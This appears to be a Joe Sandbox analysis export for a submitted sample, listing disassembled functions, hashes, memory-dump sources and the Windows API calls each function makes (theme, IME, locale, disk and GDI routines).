                                                                                                                                  • Opcode ID: b7445c870a877997434ffc451937a7817cd57395b676cf6db817ad6b0d65889b
                                                                                                                                  • Instruction ID: 53618bf0d19f1846d2f5ee89a70184816d026ef3557436fb366a8fde9d67cf07
                                                                                                                                  • Opcode Fuzzy Hash: b7445c870a877997434ffc451937a7817cd57395b676cf6db817ad6b0d65889b
                                                                                                                                  • Instruction Fuzzy Hash: F9116035B10226AFAB20DF68C694E7AB3E5AF04704F244474E804DF355D772FE509B40
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32(00000000,042034F4), ref: 04203478
                                                                                                                                  • FormatMessageA.KERNEL32(00001000,00000000,00000000,00000400,?,00000100,00000000,00000000,042034F4), ref: 0420349E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorFormatLastMessage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3479602957-0
                                                                                                                                  • Opcode ID: 47684520dd4d93864044527a9426ce646fc943971009a72767d4e06eeb5fa5e5
                                                                                                                                  • Instruction ID: 6b2942001231ccd71fefb7f27a6e803bdc8ba5d0c3f666591456b0849b3790d4
                                                                                                                                  • Opcode Fuzzy Hash: 47684520dd4d93864044527a9426ce646fc943971009a72767d4e06eeb5fa5e5
                                                                                                                                  • Instruction Fuzzy Hash: 6F01A7747146155FF722EBA1CCC1BE9B3E8EB58704F8280A0EE44E62C1EBF47D808914
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 041E8F79
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DiskFreeSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1705453755-0
                                                                                                                                  • Opcode ID: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
                                                                                                                                  • Instruction ID: 69e546395c780140dabec79f78ed848fdbc188eee96c2d07416c15225a006ec4
                                                                                                                                  • Opcode Fuzzy Hash: 191ca3f66228928a77bd306299e92db161272771861cde97e417a21d7851d906
                                                                                                                                  • Instruction Fuzzy Hash: 9C1100B5A00609AF9B00CF99C8809AFB7F9EFCC314B54C559A404E7250E631AA01CB90
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 041EB8E2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                                                  • Instruction ID: c8894e4077c020e572b9887425d581f630de41d81180cb3f501b5a1d62ec1d55
                                                                                                                                  • Opcode Fuzzy Hash: 2c53b1a2239317bfc178ecae58eec27d8364ed45474992c4285a8de5d7b9ac4e
                                                                                                                                  • Instruction Fuzzy Hash: 02E0D876B0461817E714E5AA8CC4EF6725C9758310F40026AFA48C7345EFA0BD9043E8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,041ED07E,00000000,041ED297,?,?,00000000,00000000), ref: 041EB923
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InfoLocale
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                  • Opcode ID: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                                                  • Instruction ID: afb023c6317ffe6e511235461e34e1f4fc0fab0138dc02bad115b6d5fc7d9fb4
                                                                                                                                  • Opcode Fuzzy Hash: b1d6ec197b977121f08516ee7595b6c71277cc4a711715de584c8d8cf224beea
                                                                                                                                  • Instruction Fuzzy Hash: 37D05EAA30E6603AB214915B2DC4E7B5ADCCAC56A5F41407AB688C6202D300AC069671
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 481472006-0
                                                                                                                                  • Opcode ID: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
                                                                                                                                  • Instruction ID: 187febae984e24e9f355d15c2f694edcdd69b106221c60f656e13a4b55416d42
                                                                                                                                  • Opcode Fuzzy Hash: 40780567ea648be6f000db617f10910e690f96be7393bdb0f4d36b03cf102dc8
                                                                                                                                  • Instruction Fuzzy Hash: D1A01204404C2041954033194C0213430C05810A20FC4074068F8442D0EA1D11208097
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: F
                                                                                                                                  • API String ID: 0-1304234792
                                                                                                                                  • Opcode ID: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                                                  • Instruction ID: f4bef169c7c86ed80806e696eeae7f21b8d6663f42c755284999afcb41c234bb
                                                                                                                                  • Opcode Fuzzy Hash: d6ffe21d2d941e64807bf3424b63dbe30d820b4283a3ce816c806b92c1b66454
                                                                                                                                  • Instruction Fuzzy Hash: 60518A71F106198BEB18CE5DC8907AEBAE7EBC8314F54813DD90AE7384EA747E418744
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
                                                                                                                                  • Instruction ID: ade08fe6fed8cec49215598d7efacd6042736f85a44b27b15140cb2acf1912ea
                                                                                                                                  • Opcode Fuzzy Hash: d4cd4ac750aaa4fdc6fa5def1d1338f3c5baa6be6637f6278bb22647abcb1768
                                                                                                                                  • Instruction Fuzzy Hash: FFF1A371F20219AFEF04AFA9CC45BEEBFBAEF84344F148114F942B7191DA7469518B60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
                                                                                                                                  • Instruction ID: 9687695092711c5ffd2514d37f3791b16408a9d04f3e4bb04122769495a601ee
                                                                                                                                  • Opcode Fuzzy Hash: e72b05c9f72d7b1b0b82fb8626393fb8d2f34d5ddac7137c58889079514876d8
                                                                                                                                  • Instruction Fuzzy Hash: 00D13935B247466BEB19CFA8DD807ADBBF5EFC9304F1480B9E44993241EB74AA50CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
                                                                                                                                  • Instruction ID: d90c658bde94092cd9bd1365ad78f14d3ba15163fb2101e2be90f11773ea796f
                                                                                                                                  • Opcode Fuzzy Hash: da1b029b2c8cd817535cc31f51fa5df94214df832fd31e041a81918ffc2b5124
                                                                                                                                  • Instruction Fuzzy Hash: 27A1F331B20115AFEB04FE6ACC44BBEB7A7DFC4314F14C124E816EB295DBB4A951CA64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                  • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                  • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                  • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0420BAF7), ref: 0420B77A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0420B792
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0420B7A4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0420B7B6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0420B7C8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0420B7DA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0420B7EC
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0420B7FE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0420B810
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0420B822
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0420B834
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0420B846
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0420B858
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0420B86A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0420B87C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0420B88E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0420B8A0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0420B8B2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0420B8C4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0420B8D6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0420B8E8
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0420B8FA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0420B90C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0420B91E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0420B930
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0420B942
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0420B954
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0420B966
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0420B978
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0420B98A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0420B99C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0420B9AE
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0420B9C0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0420B9D2
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0420B9E4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0420B9F6
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0420BA08
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0420BA1A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0420BA2C
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0420BA3E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0420BA50
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0420BA62
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0420BA74
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0420BA86
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0420BA98
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0420BAAA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0420BABC
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0420BACE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$LibraryLoad
                                                                                                                                  • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                  • API String ID: 2238633743-2910565190
                                                                                                                                  • Opcode ID: a6e11bf8ff30e7f9150e291e2ff889243d9c6af78fdccc7131d29904b86761bf
                                                                                                                                  • Instruction ID: 5ceae4b9a0227950ed056032aef1fca39b736c55f8144fdd2d0c403cdb808aa0
                                                                                                                                  • Opcode Fuzzy Hash: a6e11bf8ff30e7f9150e291e2ff889243d9c6af78fdccc7131d29904b86761bf
                                                                                                                                  • Instruction Fuzzy Hash: 62A101B4B50A50AFEF10EFB9E8C9E6A3BE8EB1A7543804565A424CF245D778BC04CF15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • SetErrorMode.KERNEL32(00008000), ref: 04227041
                                                                                                                                  • GetModuleHandleA.KERNEL32(USER32,00000000,0422718E,?,00008000), ref: 04227065
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 04227072
                                                                                                                                  • LoadLibraryA.KERNEL32(imm32.dll,00000000,0422718E,?,00008000), ref: 0422708E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 042270B0
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 042270C5
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 042270DA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 042270EF
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 04227104
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 04227119
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 0422712E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 04227143
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 04227158
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 0422716D
                                                                                                                                  • SetErrorMode.KERNEL32(?,04227195,00008000), ref: 04227188
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ErrorMode$HandleLibraryLoadModule
                                                                                                                                  • String ID: ImmGetCompositionStringA$ImmGetContext$ImmGetConversionStatus$ImmIsIME$ImmNotifyIME$ImmReleaseContext$ImmSetCompositionFontA$ImmSetCompositionWindow$ImmSetConversionStatus$ImmSetOpenStatus$USER32$WINNLSEnableIME$imm32.dll
                                                                                                                                  • API String ID: 3397921170-3950384806
                                                                                                                                  • Opcode ID: a8fc0962ca88f5a8ab37e199a85819b0ac0f9962e852ac39a72e4b9bafc905bf
                                                                                                                                  • Instruction ID: 8678cd0c21b5fc960735b66a2ff4e1f66a68b998d1f452707ba64e78bf21c004
                                                                                                                                  • Opcode Fuzzy Hash: a8fc0962ca88f5a8ab37e199a85819b0ac0f9962e852ac39a72e4b9bafc905bf
                                                                                                                                  • Instruction Fuzzy Hash: 8D3126B8754750BFEB00EBA9B98AA2E7BB8EBC4754B804555F504AB200D778BC04CF14
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 041EE609
                                                                                                                                    • Part of subcall function 041EE5D4: GetProcAddress.KERNEL32(00000000), ref: 041EE5ED
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.1532392387.00000000041E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 041E0000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.1532370907.00000000041E0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000424A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000000.00000002.1533636704.000000000436E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_41e0000_qDKTsL1y44.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressHandleModuleProc
                                                                                                                                  • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                  • API String ID: 1646373207-1918263038
                                                                                                                                  • Opcode ID: 767142928cb4c7c87b08184cee3b33c3171086de4311c8f9a8e9747040d5a10a
                                                                                                                                  • Instruction ID: 3a1102cb8c26bf10835e4c038e1d676311011c6de3b243473360eb18b35ecae1
                                                                                                                                  • Opcode Fuzzy Hash: 767142928cb4c7c87b08184cee3b33c3171086de4311c8f9a8e9747040d5a10a
                                                                                                                                  • Instruction Fuzzy Hash: 20411A7C748B055A72046B6F7AC483B77D8DA44628764402AB508BAA44EF26FD82C72B
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,00000001,00000001), ref: 042036F3
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 04203708
                                                                                                                                  • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,CCAA0029,00000000,04203778,?,?), ref: 0420374C
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 04203766
                                                                                                                                  • DeleteObject.GDI32(?), ref: 04203772
                                                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 04203786
                                                                                                                                  • CreateCompatibleBitmap.GDI32(?,?,?), ref: 042037A7
                                                                                                                                  • SelectObject.GDI32(?,?), ref: 042037BC
                                                                                                                                  • SelectPalette.GDI32(?,0E080DB6,00000000), ref: 042037D0
                                                                                                                                  • SelectPalette.GDI32(?,?,00000000), ref: 042037E2
                                                                                                                                  • SelectPalette.GDI32(?,00000000,000000FF), ref: 042037F7
                                                                                                                                  • SelectPalette.GDI32(?,0E080DB6,000000FF), ref: 0420380D
                                                                                                                                  • RealizePalette.GDI32(?), ref: 04203819
                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0420383B
                                                                                                                                  • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 0420385D
                                                                                                                                  • SetTextColor.GDI32(?,00000000), ref: 04203865
                                                                                                                                  • SetBkColor.GDI32(?,00FFFFFF), ref: 04203873
